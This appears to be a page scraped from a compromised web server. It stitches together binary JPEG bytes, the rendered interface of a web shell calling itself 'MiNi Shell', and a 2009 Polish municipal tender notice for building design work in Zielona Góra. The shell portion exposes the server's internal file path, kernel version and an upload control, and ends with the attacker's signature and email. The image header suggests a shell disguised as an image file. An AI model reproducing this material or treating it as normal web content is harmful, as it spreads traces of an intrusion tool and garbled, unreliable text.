JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/133178-N-2009.html

<p class="kh_header"><b>Zielona Góra: Wykonanie dokumentacji projektowej (wszystkie branże) wraz z uzyskaniem pozwolenia na budowę oraz pozostałe opracowania zawarte przedmiocie zamówienia w ramach zadania inwestycyjnego Program wspierania organizacji gospodarczych: Adaptacja budynku przy ul. Reja na siedzibę organizacji gospodarczej w Zielonej Górze, ul. Reja 6, dz. 274.</b><br>
<b>Numer ogłoszenia: 133178 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta , ul. Podgórna 22, 65-424 Zielona Góra, woj. lubuskie, tel. 0684564100,4564406 do 08, faks 068 4564155, 4564455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zielona-gora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej (wszystkie branże) wraz z uzyskaniem pozwolenia na budowę oraz pozostałe opracowania zawarte przedmiocie zamówienia w ramach zadania inwestycyjnego Program wspierania organizacji gospodarczych: Adaptacja budynku przy ul. Reja na siedzibę organizacji gospodarczej w Zielonej Górze, ul. Reja 6, dz. 274..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.1.	pozyskanie matrycy do celów projektowych, wszelkich opinii, uzgodnień, oświadczeń i decyzji niezbędnych dla uzyskania pozwolenia na budowę,
3.1.2.	opracowanie ekspertyzy określającej stan techniczny istniejącego budynku w zakresie budowlanym, instalacji elektrycznych, instalacji sanitarnych na podstawie inwentaryzacji budowlanej przekazanej przez Zamawiającego oraz po dokonaniu odkrywek, badań i sprawdzeń w budynku w ilości 3 egz. wraz z wersją elektroniczną - 2 kpl.,
3.1.3.	opracowanie projektu budowlanego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 03.07.2003 r. (Dz.U.Nr.120, poz.1133) w ilości 7 egzemplarzy oraz projektu wykonawczego zgodnie z Rozporządzeniem Ministra Infrastruktury
z dnia 02.09.2004 r. (Dz. U. Nr 202, poz. 2072) w ilości 6 egzemplarzy obejmującego wszystkie branże niezbędne do realizacji adaptacji wraz z wersją elektroniczną na płycie CD projektu budowlanego i projektu wykonawczego (wszystkie branże) - po 2 kpl.,
3.1.4.	wykonanie kosztorysów  inwestorskich (wszystkie branże ) opracowanych wg Rozporządzenia Ministra Infrastruktury z dnia 18.05.2004 r.(Dz. U. Nr 130,poz.1389 ) wraz ze zbiorczym zestawieniem kosztów inwestycji - 4 kpl. wraz z wersją elektroniczną na płycie CD w programie EXCEL lub WORD - 2 kpl.,
3.1.5.	opracowanie specyfikacji technicznych wykonania i odbioru robót (wszystkie branże) po 5kpl. zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r.  (Dz.U.Nr.202,poz.2072) obejmujących tylko rozwiązania zawarte w projektach wykonawczych wraz z wersją elektroniczną w programie WORD na płycie CD 2 kpl.  
3.1.6.	opracowanie przedmiaru robót dla oferentów ( wszystkie branże ) na bazie specyfikacji technicznych wykonania i odbioru robót zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. (Dz.U.Nr.202,poz.2072) - 3 kpl. wraz 
z wersją elektroniczną na płycie CD w programie EXCEL lub WORD - 2 kpl. (każda branża),
3.1.7.	opracowanie harmonogramu realizacji robót - 2 egz. wraz z wersją elektroniczną na  płycie CD- 2 kpl.,
3.1.8.	opracowanie studium wykonalności projektu na potrzeby dofinansowania inwestycji 
z funduszy Unii Europejskiej - 5 egz. wraz z wersją elektroniczną na płycie CD - 2 kpl.,
3.1.9.	opracowanie opisu przedmiotu zamówienia dotyczącego wszystkich branż, niezbędnego do ogłoszenia przetargu na realizację inwestycji zgodnie 
z opracowanym projektem wykonawczym - 4 egz. wraz z wersją elektroniczną na płycie CD - 4 kpl.,
3.1.10.	uzyskanie pozwolenia na budowę,
3.1.11.	sprawowanie nadzoru autorskiego przez projektantów wszystkich branż do czasu zakończenia realizacji inwestycji.
3.1.12.	Oferent zobowiązany jest do dokonania wizji lokalnej w budynku. 

3.2.	Dane wyjściowe do projektowania:
3.2.1.	Budynek ma być siedzibą następujących organizacji gospodarczych:
- LIB - Lubuska Izba Budownictwa,
- OPZL - Organizacja Pracodawców Ziemi Lubuskiej;
3.2.2.	Proponowane przeznaczenie pomieszczeń:
3.2.2.1.	Piwnica:
	001,003 - archiwum,
	002 - magazyn OPZL/LIB,
	004 - pomieszczenie gospodarcze (środki czystości),
3.2.2.2.	Parter:
	05,06 - recepcja centralna ( pomieszczenia połączone ) - 2 miejsca pracy,
	04 - sala spotkań (wejście z korytarza ),
	02 - pomieszczenie biurowe - 2 stanowiska pracy, LIB,
	01 - pomieszczenie biurowe - 1 stanowisko pracy, LIB,
	03 - wc, do użytku LIB
wc LIB, kuchnia - miejsce zależne od lokalizacji pionów wod.-kan.,
na półpiętrze wc ogólnodostępne,
3.2.2.3.	Piętro I:
	18 - pomieszczenie biurowe - max. 2 stanowiska pracy, projekty OPZL,
	17 - pomieszczenie biurowe - max. 2 stanowiska pracy, księgowość OPZL,
	16 - pomieszczenie biurowe - 1 stanowisko pracy, asystent dyrektora OPZL,
	15 - pomieszczenie biurowe - 1 stanowisko pracy, dyrektor OPZL,
	14 - sala obrad OPZL,
	12 - pomieszczenie biurowe -  2 stanowiska pracy, projekty OPZL,
	11 - pomieszczenie biurowe - 1 stanowisko pracy, marketing OPZL,
 wc OPZL, kuchnia - miejsce zależne od lokalizacji pionów wod.-kan. na półpiętrze wc ogólnodostępne,
3.2.2.4.	Piętro II:
	23 - duża sala konferencyjno-szkoleniowa
	21(10,93m2)-pomieszczenie kuchenne do sali konferencyjno-szkoleniowej
	22 - wc ogólnodostępne
	21(12,08m2)- pomieszczenie biurowe - 1 stanowisko pracy - inne stowarzyszenia
	24 - pomieszczenia biurowe, max. 2 stanowiska pracy - inne stowarzyszenia
3.2.2.5.	Piętro III:
	33,34 - pomieszczenia klubowe (połączone) - OPZL, LIB, inni,
	35 - salka spotkań, zaplecze pomieszczenia klubowego - OPZL, LIB, inni,
	36 - pomieszczenie kuchenne - OPZL, LIB, inni,
	37 - pokój gościnny (noclegowy) z łazienką - OPZL, LIB, inni,
	32 - wc ogólnodostępne,
	31 - palarnia ogólnodostępna,
3.2.2.6.	Poddasze:
	niewykorzystane;
3.3.	Obowiązki Projektanta na etapie opracowywania dokumentacji projektowej:

3.3.1.	Projektant zobowiązany jest do pisemnego uzgodnienia z Inwestorem 
i Użytkownikiem wstępnej fazy rozwiązań projektowych obiektu kubaturowego jak 
i propozycji zagospodarowania terenu. 
3.3.2.	Projektant zobowiązany jest do zorganizowania minimum 3 spotkań roboczych Projektantów z Inwestorem i Użytkownikiem na etapie sporządzania dokumentacji projektowej w celu omówienia przyjętych rozwiązań projektowych i materiałowych, które  muszą zakończyć się pisemnymi protokółami podpisanymi przez strony.
3.3.3.	Projektant wszelkie dodatkowe opracowania niezbędne do uzyskania wymaganych opinii i uzgodnień uzyska własnym staraniem i na swój koszt.
3.3.4.	Projektant zapewni opracowanie dokumentacji projektowej z należytą starannością 
w sposób określony w decyzji o lokalizacji inwestycji celu publicznego, w decyzji 
o pozwoleniu na budowę i wymaganiami ustaw a w szczególności:
- ustawy z 07.07.1994 r. Prawo Budowlane ( tekst jednolity), ( Dz. U. Nr 156  z 2006 r. poz. 1118, 
- rozporządzenia Ministra Infrastruktury z dnia 03 lipca 2003 r. (Dz.U.Nr.120 z 2003 r., poz.1133) w sprawie szczegółowego zakresu i formy projektu budowlanego,
- rozporządzenia Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202 z 2004 r. poz. 2072 ),
- rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie sporządzania kosztorysu inwestorskiego ( Dz. U. Nr 130 z 2004 r. poz. 1389 ),
- obowiązującymi normami oraz zasadami wiedzy technicznej;
3.3.5.	Opracowana dokumentacja będzie wzajemnie skoordynowana technicznie 
i kompletna z punktu widzenia celu, któremu ma służyć. Zawierać będzie wymagane potwierdzenia sprawdzeń rozwiązań projektowych, wymagane opinie, uzgodnienia, zgody i pozwolenia w zakresie wynikającym z przepisów. Posiadać będzie oświadczenie Projektanta, podpisane przez sprawdzających odpowiedzialnych za spełnienie tych wymagań i oświadczenie o kompletności.
3.3.6.	W opracowanej dokumentacji będą zastosowane wyroby budowlane (materiały 
i urządzenia ) dopuszczone do obrotu i powszechnie dostępne na rynku uzgodnione 
z Zamawiającym na spotkaniach roboczych.
3.3.7.	Przedmiot zamówienia będzie opracowany w czterech etapach:
3.3.7.1.	 - I etap - prace przygotowawcze i wstępne prace projektowe (matryca, dokumentacja  geotechniczna, uzyskanie decyzji o lokalizacji inwestycji celu publicznego, wstępne rozwiązania projektowe i materiałowe),
3.3.7.2.	 - II etap - projekt budowlany i uzyskanie pozwolenia na budowę,
3.3.7.3.	 - III  etap - projekt wykonawczy,
3.3.7.4.	 - IV etap - specyfikacje techniczne wykonania i odbioru robót, kosztorys inwestorski, przedmiar robót dla oferentów, harmonogram realizacji robót, opis przedmiotu zamówienia;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 5.1.	W przetargu mogą wziąć udział Wykonawcy niewykluczeni na podstawie art. 24 ust. 1 i 2 ustawy pzp, spełniający warunki zawarte w art. 22 ust. 1 pkt 1-3 ustawy pzp oraz spełniający szczegółowe warunki udziału: 
5.1.1.	dysponują osobami lub będą nimi dysponować, które będą uczestniczyć 
w wykonywaniu zamówienia posiadającymi uprawnienia budowlane do projektowania, należącymi do właściwej izby samorządu zawodowego zgodnie z wymogami ustawy 
z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 - tekst jednolity z późn. zm.) 
a) w niżej wymienionych branżach:
- architektonicznej bez ograniczeń, z zastrzeżeniem punktu 5.1.1.b.
- konstrukcyjnej bez ograniczeń,
- elektrycznej bez ograniczeń,
-	drogowej w ograniczonym zakresie,
- sanitarnej w ograniczonym zakresie,
b)	osoba z uprawnieniami w branży architektonicznej musi posiadać doświadczenie 
w projektowaniu minimum w jednego przedsięwzięcia dot. adaptacji obiektów zabytkowych na obiekty użyteczności publicznej;
5.1.2.	zrealizowali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zadania o minimalnej wartości 40.000,00 zł brutto każde, w tym 1 zadanie w zakresie projektowania obiektów użyteczności publicznej udokumentowane, że zostały wykonane należycie;
5.2.  	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3) - 6.1.9) SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	wypełniony formularz oferty wg załącznika Nr 1 do SIWZ;
2)	oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy podwykonawcom wg załącznika Nr 2 do SIWZ; 
3)	wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 3 ustawy pzp wg załącznika Nr 3 do SIWZ;
4)	wypełnione i podpisane oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie 
art. 24 ust. 1 i ust. 2 ustawy pzp wg załącznika Nr 4 do SIWZ;
5)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6)	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wg załącznika nr 5 do SIWZ - na potwierdzenie spełnienia warunku określonego w punkcie 5.1.1. SIWZ;
7)	dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień na potwierdzenie spełnienia warunku określonego w punkcie 5.1.1. SIWZ;
8)	pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 6.1.6) SIWZ Wykonawca wskazał osoby, którymi będzie dysponował - na potwierdzenie spełnienia warunku określonego w punkcie 5.1.1. SIWZ;
9)	wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi zostały wykonane należycie wg załącznika Nr 6 do SIWZ na potwierdzenie spełnienia warunku określonego w punkcie 5.1.2. SIWZ;
10)	zaakceptowany projekty umowy wg załącznika Nr 7 do SIWZ; 
11)	pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy;

6.2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w:
6.2.1.	pkt 6.1.5) SIWZ składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6.3.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 6.2. SIWZ, zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zielona-gora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zielona Góra, Podgórna 22, Pokój 408.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 11:00, miejsce: Urząd Miasta Zielona Góra, Podgórna 22, Pokój 408.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com